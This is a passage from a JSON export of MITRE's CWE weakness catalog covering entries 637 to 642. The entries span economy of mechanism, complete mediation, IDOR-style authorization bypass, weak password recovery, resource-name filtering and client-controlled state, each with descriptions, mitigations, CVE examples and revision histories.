Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Failing Securely","attr":{"@_Date":"2008-09-09"}},{"#text":"Design Principle Violation: Not Failing Securely (aka \'Failing Open\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Not Failing Securely (aka \'Failing Open\')","attr":{"@_Date":"2009-05-27"}}]}},"637":{"attr":{"@_ID":"637","@_Name":"Unnecessary Complexity in Protection Mechanism (Not Using \'Economy of Mechanism\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used.","Extended_Description":"Security mechanisms should be as simple as possible. Complex security mechanisms may engender partial implementations and compatibility problems, with resulting mismatches in assumptions and implemented security. A corollary of this principle is that data specifications should be as simple as possible, because complex data specifications result in complex validation code. Complex tasks and systems may also need to be guarded by complex security checks, so simple systems should be preferred.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unnecessary Complexity"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Avoid complex security mechanisms when simpler ones would meet requirements. Avoid complex data models, and unnecessarily complex operations. Adopt architectures that provide guarantees, simplify understanding through elegance and abstraction, and that can be implemented similarly. Modularize, isolate and do not trust complex code, and apply other secure programming principles on these modules (e.g., least privilege) to mitigate vulnerabilities."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The IPSEC specification is complex, which resulted in bugs, partial implementations, and incompatibilities between vendors."},{"Intro_Text":"HTTP Request Smuggling (CWE-444) attacks are feasible because there are not stringent requirements for how illegal or inconsistent HTTP headers should be handled. This can lead to inconsistent implementations in which a proxy or firewall interprets the same data stream as a different set of requests than the end points in that stream."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6067","Description":"Support for complex regular expressions leads to a resultant algorithmic complexity weakness (CWE-407).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6067"},{"Reference":"CVE-2007-1552","Description":"Either a filename extension and a Content-Type header could be used to infer the file type, but the developer only checks the Content-Type, enabling unrestricted file upload (CWE-434).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1552"},{"Reference":"CVE-2007-6479","Description":"In Apache environments, a \\"filename.php.gif\\" can be redirected to the PHP interpreter instead of being sent as an image/gif directly to the user. Not knowing this, the developer only checks the last extension of a submitted filename, enabling arbitrary code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6479"},{"Reference":"CVE-2005-2148","Description":"The developer cleanses the $_REQUEST superglobal array, but PHP also populates $_GET, allowing attackers to bypass the protection mechanism and conduct SQL injection attacks against code that uses $_GET.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2148"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-524"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Using Economy of Mechanism","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Use Economy of Mechanism","attr":{"@_Date":"2010-12-13"}}]}},"638":{"attr":{"@_ID":"638","@_Name":"Not Using Complete Mediation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity\'s rights or privileges change over time.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data","Other"],"Note":"A user might retain access to a critical resource even after privileges have been revoked, possibly allowing access to privileged functionality or sensitive information, depending on the role of the resource."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Invalidate cached privileges, file handles or descriptors, or other access credentials whenever identities, processes, policies, roles, capabilities or permissions change. Perform complete authentication checks before accepting, caching and reusing data, dynamic content and code (scripts). Avoid caching access control decisions as much as possible."},{"Phase":"Architecture and Design","Description":"Identify all possible code paths that might access sensitive resources. If possible, create and use a single interface that performs the access checks, and develop code standards that require use of this interface."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"When executable library files are used on web servers, which is common in PHP applications, the developer might perform an access check in any user-facing executable, and omit the access check from the library file itself. By directly requesting the library file (CWE-425), an attacker can bypass this access check."},{"Intro_Text":"When a developer begins to implement input validation for a web application, often the validation is performed in each area of the code that uses externally-controlled input. In complex applications with many inputs, the developer often misses a parameter here or a cookie there. One frequently-applied solution is to centralize all input validation, store these validated inputs in a separate data structure, and require that all access of those inputs must be through that data structure. An alternate approach would be to use an external input validation framework such as Struts, which performs the validation before the inputs are ever processed by the code."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-0408","Description":"Server does not properly validate client certificates when reusing cached connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0408"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"104"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-526"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Using Complete Mediation","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Use Complete Mediation","attr":{"@_Date":"2010-12-13"}}]}},"639":{"attr":{"@_ID":"639","@_Name":"Authorization Bypass Through User-Controlled Key","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The system\'s authorization functionality does not prevent one user from gaining access to another user\'s data or record by modifying the key value identifying the data.","Extended_Description":{"xhtml:p":["Retrieval of a user record occurs in the system based on some key value that is under user control. The key would typically identify a user-related record stored in the system and would be used to lookup that record for presentation to the user. It is likely that an attacker would have to be an authenticated user in the system. However, the authorization process would not properly check the data access operation to ensure that the authenticated user performing the operation has sufficient entitlements to perform the requested data access, hence bypassing any other authorization checks present in the system.","For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value.","One manifestation of this weakness is when a system uses sequential or otherwise easily-guessable session IDs that would allow one user to easily switch to another user\'s session and read/modify their data."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Insecure Direct Object Reference / IDOR","Description":"The \\"Insecure Direct Object Reference\\" term, as described in the OWASP Top Ten, is broader than this CWE because it also covers path traversal (CWE-22). Within the context of vulnerability theory, there is a similarity between the OWASP concept and CWE-706: Use of Incorrectly-Resolved Name or Reference."},{"Term":"Broken Object Level Authorization / BOLA","Description":"BOLA is used in the 2019 OWASP API Security Top 10 and is said to be the same as IDOR."},{"Term":"Horizontal Authorization","Description":"\\"Horizontal Authorization\\" is used to describe situations in which two users have the same privilege level, but must be prevented from accessing each other\'s resources. This is fairly common when using key-based access to resources in a multi-user context."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Access control checks for specific user data or functionality can be bypassed."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Horizontal escalation of privilege is possible (one user can view/modify information of another user)."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested."},{"Phase":["Architecture and Design","Implementation"],"Description":"Make sure that the key that is used in the lookup of a specific user\'s record is not controllable externally by the user or that any tampering can be detected."},{"Phase":"Architecture and Design","Description":"Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering."}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"}],"Previous_Entry_Name":{"#text":"Access Control Bypass Through User-Controlled Key","attr":{"@_Date":"2011-03-29"}}}},"640":{"attr":{"@_ID":"640","@_Name":"Weak Password Recovery Mechanism for Forgotten Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.","Extended_Description":{"xhtml:p":["It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user\'s account. Weak password recovery schemes completely undermine a strong password authentication scheme.","This weakness may be that the security question is too easy to guess or find an answer to (e.g. because the question is too common, or the answers can be found using social media). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system\'s weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain unauthorized access to the system by retrieving legitimate user\'s authentication credentials."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker could deny service to legitimate system users by launching a brute force attack on the password recovery mechanism using user ids of legitimate users."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The system\'s security functionality is turned against the system by the attacker."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated."},{"Phase":"Architecture and Design","Description":"Do not use standard weak security questions and use several security questions."},{"Phase":"Architecture and Design","Description":"Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses."},{"Phase":"Architecture and Design","Description":"Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record."},{"Phase":"Architecture and Design","Description":"Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism."},{"Phase":"Architecture and Design","Description":"Assign a new temporary password rather than revealing the original password."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":49,"Entry_Name":"Insufficient Password Recovery"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"50"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Notes":{"Note":[{"#text":"This entry might be reclassified as a category or \\"loose composite,\\" since it lists multiple specific errors that can make the mechanism weak. However, under view 1000, it could be a weakness under protection mechanism failure, although it is different from most PMF issues since it is related to a feature that is designed to bypass a protection mechanism (specifically, the lack of knowledge of a password).","attr":{"@_Type":"Maintenance"}},{"#text":"This entry probably needs to be split; see extended description.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Weak Password Recovery Mechanism","attr":{"@_Date":"2008-09-09"}}}},"641":{"attr":{"@_ID":"641","@_Name":"Improper Restriction of Names for Files and Other Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.","Extended_Description":"This may produce resultant weaknesses. For instance, if the names of these resources contain scripting characters, it is possible that a script may get executed in the client\'s browser if the application ever displays the name of the resource on a dynamically generated web page. Alternately, if the resources are consumed by some application parser, a specially crafted name can exploit some vulnerability internal to the parser, potentially resulting in execution of arbitrary code on the server machine. The problems will vary based on the context of usage of such malformed resource names and whether vulnerabilities are present in or assumptions are made by the targeted technology that would make code execution possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Execution of arbitrary code in the context of usage of the resources with dangerous names."},{"Scope":["Confidentiality","Availability"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart"],"Note":"Crash of the consumer code of these resources resulting in information leakage or denial of service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not allow users to control names of resources used on the server side."},{"Phase":"Architecture and Design","Description":"Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them."},{"Phase":"Architecture and Design","Description":"Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Filtering of File and Other Resource Names for Executable Content","attr":{"@_Date":"2010-06-21"}}}},"642":{"attr":{"@_ID":"642","@_Name":"External Control of Critical State Data","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software stores security-critical state information about its users, or the software itself, in a location that is accessible to unauthorized actors.","Extended_Description":{"xhtml:p":["If an attacker can modify the state information without detection, then it could be used to perform unauthorized actions or access unexpected resources, since the application programmer does not expect that the state can be changed.","State information can be stored in various locations such as a cookie, in a hidden web form field, input parameter or argument, an environment variable, a database record, within a settings file, etc. All of these locations have the potential to be modified by an attacker. When this state information is used to control security or determine resource usage, then it may create a vulnerability. For example, an application may perform authentication, then save the state in an \\"authenticated=true\\" cookie. An attacker may simply create this cookie in order to bypass the authentication."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could potentially modify the state in malicious ways. If the state is related to the privileges or level of authentication that the user has, then state modification might allow the user to bypass authentication or elevate privileges."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The state variables may contain sensitive information that should not be known by the client."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"By modifying state variables, the attacker could violate the application\'s expectations for the contents of the state, leading to a denial of service due to an unexpected error condition."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Understand all the potential locations that are accessible to attackers. For example, some programmers assume that cookies and hidden form fields cannot be modified by an attacker, or they may not consider that environment variables can be modified before a privileged program is invoked."},{"attr":{"@_Mitigation_ID":"MIT-14"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store state information and sensitive data on the server side only.","Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions.","If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328)."]}},{"Phase":"Architecture and Design","Description":"Store state information on the server side only. Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to 